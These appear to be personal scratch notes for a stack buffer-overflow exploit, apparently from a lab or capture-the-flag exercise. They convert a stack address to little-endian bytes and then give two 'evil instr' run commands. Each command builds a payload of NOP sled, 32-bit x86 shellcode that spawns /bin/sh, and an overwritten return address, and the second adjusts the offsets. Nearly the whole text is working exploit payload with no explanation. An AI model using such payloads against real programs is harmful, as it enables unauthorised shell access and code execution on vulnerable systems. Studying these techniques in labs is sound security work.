0xbfffeee0
bfffeee0
bf ff ee e0
e0 ee ff bf
\xe0\xee\xff\xbf

evil instr: run <<< $(python -c 'shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; print "\x90"*(84 - len(shellcode)) + shellcode + "\x90"*8  + "\xe0\xee\xff\xbf"')

new ret: 0xbfffeecc
\xcc\xee\xff\xbf

new evil instr: run <<< $(python -c 'shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; print "\x90"*(52 - len(shellcode)) + shellcode + "\x90"*40  + "\xcc\xee\xff\xbf"*10')
